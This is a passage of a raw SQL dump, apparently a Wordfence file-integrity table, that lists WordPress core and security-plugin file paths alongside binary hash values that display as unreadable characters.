��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�ڱ�h׹ys$�9�','��5$��);5�X�@�D8������z��','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w��R��P��2���','��\Zg�e���:I�z\nq�к>��[�m��h��','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ�����WS�Rh?�I','� �\r��(�_�q*h7w@�L_C���s+','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�h;�96��G��\r�','5i)�c\\�$I�tw_���m:�\Z�U�L&9;f','',0,'?'),('�W�-�ى��|�Ǘ��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��b�)EoB�$�w�M','�x�c�$I-=�VMjSd�b�6A;{��','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�[�?��n2��\"d�d','wp-content/plugins/wp-cerber/assets/bn4ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��L���uLT�','�TZ�G���~S-�{&M:�\r��/7O���T�','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j���~�\\�˩��','�_weC�\\E4���^mZ4���-g\'As�o6','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�l_S�	9�����[','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��4��)�R�>��i','�4xZP���]�QT[6�Z;����n���P�','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rl�A�Hט뀏ׄj','�+�h�%23�^�K��#l]r�aBc\r��4��b','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e���(a�d�\Z�C','��\"����G��-��O��\'��B� �^','',0,'?'),('��\0ceU�`�{��g��','wp-content/plugins/wp-cerber/assets/flags/kr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uґ0Pl�{��ip','Zy���\Z�(�r��Q�N��ӌ���b�[P���','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�̦���QK�#΀','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w�	L�e�Fz�]�','',0,'?'),('����~\Z��%⟘����','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ƣٿc;���z���','��N�J�s�@�3	�:h)�7K�<�\\N�+','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���LP���S[��f�','F@H���8�݇��7an���#{�����j�','',0,'?'),('���t��I��.����','wp-content/plugins/redirection/api/api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��#�k��4;�7V�','���i�uܭ�/�э�`=Z�YC�����`','',0,'?'),('��nHHХR���?','wp-content/plugins/wp-cerber/assets/flags/gh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,La^���#d�e\'','��^�sV��z�3���:4�i�[��K���','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('��G��ۉ��\\}����','wp-content/plugins/wp-cerber/assets/flags/cc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� .-6�׈���C#�','&��i��y�_��_����vV>�~���d','',0,'?'),('��c�R�f3�p5�','wp-content/plugins/redirection/modules/apache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p`�se��5XgC�\n��','bM[M�-��b\'�c~Tk�t���кG��','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{K_��eG�@{	/','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('�����JH�l\"G�L�','wp-includes/css/dist/block-library/reset-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�X����L�\Z','����\rH�{�f���G^�?U<�6�1','',0,'?'),('���`I�oms�S!�','wp-content/plugins/redirection/locale/redirection-en_GB.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','88c�<:�~�\n7�Ӥd','��5�]���4��r5^�����*�ex���Q%','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6݋���h	','',0,'?'),('�9�[�E:Ѷq	��A','wp-includes/blocks/calendar/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��iw�hw�Z�1','5v���ɭ<�%�U��B#���5z�h]� ','',0,'?'),('�*42/�>E૓�2','wp-content/plugins/redirection/locale/redirection-el.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��0P\0��%2��','�^����2�=����My���W��=�a\Z<l�t','',0,'?'),('�S���q�`���M�','wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڡq�1�b��4�	G*','{U%�Hv��3�)�|w��-L��&���.䌩','',0,'?'),('�n֢��\r�V5��,�','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O^�F�ci�zJS','S�6{�F֐���Z0�C��r�c��\0\\T��:','',0,'?'),('�o����l>��x~I� �','wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���(���4�G�','��j/}Ӆ���\0E�S��̤\\Hg�#Z��._','',0,'?'),('���0j�l�S�K�','wp-includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}x�oF�����_/�÷P','�N��m-�h.���\rp�xNIh��[@\'�U�A�','',0,'?'),('����ސ�q�ic�=�','wp-includes/class-wp-simplepie-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�k�ϖх�X�','���/�\'C��?C\Zfb�%�$�=V6 �\\�','',0,'?'),('��s�ՌQ��7o���','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Ufxy9�9��g4��','���E�F�j՗&\n��E��&J՟gWk.���T/','',0,'?'),('�«��-j=�u�N\\q\'','wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8)���}{��C�h2U','|A��L��Mb�x�d8X�jX.���^\n\Z�','',0,'?'),('��u�gk�D��E��K','wp-includes/blocks/query-pagination-numbers/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','miƈ�nѪą@@b\\','8���&�����]Y���Y��✀fu�oM�@T��','',0,'?'),('��ᗏ�3�-��4�','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���t�Pc���c<Dm','���{j͑1�t��ͻ_|?F���	�Ռ�y�ډ','',0,'?'),('�Hh�t~\"�$�JX','wp-content/themes/newsmagbd/vendors/breadcrumbs/breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cT��\n	#�','��߂\n�_1q�.9�n����ߓzcW�gͩ��','',0,'?'),('�\"ڕK[@�G����9�','wp-admin/includes/class-wp-theme-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<d�|~\Z���$��K','��5���F(*��\0�6t�<ಌ2	�A�3���','',0,'?'),('�#��u0�c���}���','wp-includes/js/dist/i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�CQ���9A4n�\nCa','\Z�.H~2\Z��P����{���&���c��H\0�','',0,'?'),('�$�Q�sP���R3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9o;&�t���','C۞�`�)�t����f��K|j�����d�~','',0,'?'),('�3!9�=�6�ݡ','wp-admin/images/resize-rtl-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M���M�H�!�YA','�2��m�o��{�|�ny��˃�4(�φ�=�','',0,'?'),('�Ioo�Ԇ5nu�ѭ��H','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�Zg�Ui1i�ƾ�x�=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�W�,��XEE�o�','l?���)&&������P��P$@�\\�/�','',0,'?'),('�^2^�T��:�mJ��:�','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܢj��lhŬ�\n�','�|�E����*5C�T)QB�Rߦ�:�+\Z�2;','',0,'?'),('�b�0݀>j�\"��G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('���n�Ioc�!���','wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('���o<��e����','wp-content/plugins/redirection/locale/redirection-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�۷�\n�М��','%A��I[��TQ�Ʀ���K������}*w��,','',0,'?'),('���c����Vs�9�o��','wp-includes/css/dist/editor/editor-styles-rtl.css',0,'#YR\nP��>�y�L�,','#YR\nP��>�y�L�,','�4�A�&E(6��~�e�|vH��l�;���R�','',0,'?'),('��sC<�:���<�A�','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:�Z{���5�o','���<�s�6��\0,	Ra�uhX��c���','',0,'?'),('�����@�j=�','wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nR�1G˕�\n���hc�','����� ��^b��V���l!�,�G�3/','',0,'?'),('�)[\"J�H��|�jk��$','wp-admin/js/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����0؛�;q��','���[\'0y����W��x���p�*-t-I�d�','',0,'?'),('�?Fϸ����A��R1�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ԏ�d0��lN&7+','^s\n�@G,�ږ\n;|3P	nԔ/\rzA�\"\nd','',0,'?'),('�JTV0D��oTA[@�','wp-admin/options-discussion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��~�vg��3ܘ�','�lAt;��#�Tt�_�y\\S=���#:X٥j�','',0,'?'),('��\\����\r� ��:#�K','wp-content/plugins/wp-cerber/assets/flags/bo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0-�a�vv��','=�IS}�@l��U�%s�=�FG41R�\'�','',0,'?'),('����S�8M�C��>��','wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:��	����',')24�Na�K�-���d��E��ʂ	��','',0,'?'),('����S�h���S�%Tz�','wp-includes/js/mediaelement/wp-mediaelement.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��������3���k�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-����X>`b','�s��a�Ӌ�\0$T���bc8��dŅ���?>','',0,'?'),('��.������I�\\�','wp-content/plugins/wp-cerber/assets/flags/jo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z>\Z�➶6�A3+Lh�','��\'\"5��zF��aLK�3pr��*�=�.>aq\"','',0,'?'),('���\"ܒ����nzD','wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�8۝5:��?*)K','',0,'?'),('��ˋ�_o!\'�u��r','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���VdЌX@q�ș��','S���تA���Ӥ�@5����|�~�?KBK9U','',0,'?'),('��Z\nu�oK� ��T;e','wp-admin/images/list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��*�ӳ�S��','\\w��T[�=�b�aCk������;c���','',0,'?'),('��ll���x�L,7W�N�','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0J�.H[|�E3$d�','�\Z�z%����;�����o��n��m&������','',0,'?'),('�4)tk�l#�<��U�','wp-includes/block-patterns/query-grid-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\����J�B�<��','�sA�>�{�k�/PxYp*���L׻膺ϲ��','',0,'?'),('���Uy/�*%��;','wp-admin/includes/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\\�;KӄY','5=��1�1���6�	��*���+�Z8}s^�a','',0,'?'),('�\rE��U���̈́��','wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('�W���P旃^q�y�','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5X��P���K���','�S���P���A�_�l�W��2��?#_\rQ�x�','',0,'?'),('�I=bh�ʔGIkoba','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���瓢��)�','���k�j桕\';�Ԧ��(��u�I�sǕ�w','',0,'?'),('�h/͔��j�C�\0�n','wp-admin/includes/class-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�pT�0$�����.�','?�t�D~#͘��/X�#G/���Nf\\��͜gN','',0,'?'),('�x�W���2e�uv�L','wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('�6���?�^o�#�','wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�󞮣Py�n','',0,'?'),('���R	�(�,	!)�Z','wp-content/plugins/wordfence/waf/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��6��~.���S�[','��\\\'�_F�u�C)CR\"(C�O�YW�!��)','',0,'?'),('�������݈3�+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����,0��Z%���','�g^�M���9=&*�M{��Xb�0*�u���','',0,'?'),('�����&@p����ɗ','wp-includes/js/dist/wordcount.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L6\'��{G�p(�\"(��s','�Q��@�GC�^#��^��o��PM,Eԅ^C\Z7','',0,'?'),('���ΦHc�^����)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'�{=ͺ','���R������_f�W{*3����ݔ	�\"�/�','',0,'?'),('������sp���e�','wp-admin/includes/class-wp-ms-sites-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[II�[�I#i��','<�C~��-.�\0��9q�\\��}�)���~�[$','',0,'?'),('��(Bu�{��tZ܍','wp-content/plugins/redirection/locale/redirection-hr.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]\nwMY�gV�B��xQ','�aL;���!��>mM�R�H��T��,���3���','',0,'?'),('���@Pw�y���3�Ks','wp-includes/blocks/site-tagline/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂1c�Z�>�R �EJm','��U)�}�$EMb0mCTA�0\\pN2�O^','',0,'?'),('��	�ӭgȱ!n�P�','wp-includes/IXR/class-IXR-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR	]','',0,'?'),('���ʜ\\\"���z@*>�\Z','wp-includes/blocks/site-tagline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2oH\"ϵ8����zw ','�����h���9�DP\"��ϑ�hf��f%�','',0,'?'),('�\nD���%a-�Iq��','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Regular.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��-�\\p�R�kI�','hX�ʀF^1��it8�O��qS�)��.�','',0,'?'),('�\ni_�a*���>�dnP','wp-includes/blocks/post-excerpt/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�6�%�}�:&fM��','�+$E�kҭw�֍\rS:�|K>�_c�\0=I<q','',0,'?'),('�(������]dJ\rl','wp-content/plugins/wp-cerber/cerber-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǜ�9Twu*�Ҳ�i','��v� %Kj��׹�\\J��/��௜՝mRb��X','',0,'?'),('�-1�8�;�T�/X�]','wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3����&S��7F76�','���,�$�y�n)R��Hg���h{�$��U��','',0,'?'),('�j�<M�Dd����4m�','wp-admin/includes/ms-admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�Ƽz�g�L���','��t�Mp���Q�8=��~bw����/���','',0,'?'),('�Ρ~�ߓ�:����eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ğ��c�h4\"���','����V��}X e~G[C�峆��5������','',0,'?'),('�����(觨:pR�/','wp-includes/class-walker-nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>�d}Y�zcld','�Z\"P`��\'h�`��Lk���̼�G�~M�J�','',0,'?'),('��J�$R��_���o�','wp-content/plugins/wp-cerber/assets/flags/lk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m ���t�����','vl�a��tb�N���u�G�:���<?�7�=','',0,'?'),('��(5�aH�yo,X�','wp-includes/js/jquery/ui/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a`|��^(=`��hv','L�.X_	�DJ��tk��H��!|��ݔJ��x','',0,'?'),('�/7�ñ�cx��p��g','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�jgG9�վ��lW[�','Y�Kq���@�CP���X!J�rG�\"��?','',0,'?'),('���ڥ�^i�$��&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��\0����իw6�','7�6��ay��5�?}%.]����؞u���S�','',0,'?'),('�$�͓�bHn��,\0-','wp-includes/images/smilies/icon_confused.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/#	�Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('�,�t��!O\0�PR���|','wp-content/plugins/redirection/images/GitHub-Mark-64px.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�\',_�Jm�M>KŽ','/\rTAY��م��ѻ���v�g�>�!Eh','',0,'?'),('�-��췓��9�ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xw���Tg���A}�\n','�k�cQx�e�˳`=n6�X5y��dz5u]WB\'','',0,'?'),('�N��ZND��N�>Y	','wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���U�J8�A�t9A','[�i��L��|�R/n!���\n��F�({D�','',0,'?'),('�{4�.������#�#','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B<�<��LU�:uUn','�ZІ��\\�@@�G��P��#=|�\'k4��','',0,'?'),('�ܰ����_~�h	sc','wp-includes/blocks/spacer/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	@-ŏ��K$_ӯp�','�D�\Z�e�(�kr�����l0�u�[Iya/�/�H','',0,'?'),('��_ܼ���iJ�d�\"','wp-includes/blocks/heading/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y��<�(�Ę�','�\rU���tJ�`�g04	n��՞F�LZ���','',0,'?'),('��v\'j@�-��*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('����X���-��Of','wp-includes/blocks/nextpage/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5���ډd��2,�','8	�:�	D+�\"d����sW�\0\Z���̞�','',0,'?'),('�\n]Eg���7Oq�b��','wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('����n��j�P�+��','wp-admin/includes/class-custom-image-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����[޵*1�%��q�','�HS�- �\'��3��6}ެ^���W�y|��','',0,'?'),('�\Z�������Bi/6�','wp-includes/js/jquery/ui/effect-clip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('�8u7�h@jx�\"�5','wp-includes/class-wp-block-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fW�ެ�Q�G��<4','ԥ?�CZæ���\Z�+J4|����d�F߾o�','',0,'?'),('�L���yE�{��f�','wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('�g�bf�\r\Z��ъ�','wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3:&[��󿵺�=#�','AZag�����K\"�]&�\0�+���','',0,'?'),('�k�UL��ǡ�$���','wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]�*C�u�\0�','e�s}k�_��q}���~G���[�5�Q�u�!�','',0,'?'),('�rn�`	m��$\0��V','wp-includes/blocks/media-text/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A:d�\r���G���K�','1s���cr�G�HR�V[�s_�r��>� ','',0,'?'),('��=��-Xԍn{]�pf','wp-includes/js/wp-embed-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��we�i!<��s�y\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h8�FK�3Eq�s����','�0�T���E�Va~\'55h4��o՞�{Mɱ��\'','',0,'?'),('�����۝w6Uu%��','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('����S�D��~��p�v','wp-content/plugins/wp-cerber/assets/bn3ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\n`ehG�����}�','Ul,��/��g����Qg�\'���	�I�&','',0,'?'),('���fSu�B�ͥ?^yO','wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�%=@+��{)�|','�$%N�.%Mx�����W}�X�)2W ','',0,'?'),('����{^��W����C�','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e2-�2�0{`�X�','3�!�VG��א��A3\\K���a�����+','',0,'?'),('��Ç���JV�W�]I�','wp-includes/blocks/table/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��Ch������2h','���� ������E�\0?�}!9غ�\'e��C}i','',0,'?'),('��$[��tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�	��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('�m5��u����1}�','wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����WdU \ZXSn�p','�z1!\"f��*-ST	N�.�(�\0Z���\rd��','',0,'?'),('��&B�5V�AUU,��','wp-includes/class-wp-http-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('�1A��bȱ��8��EN','wp-includes/blocks/group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��B�	���?�w\"','��L�ֿ�)�J�ןͬL��ѴC 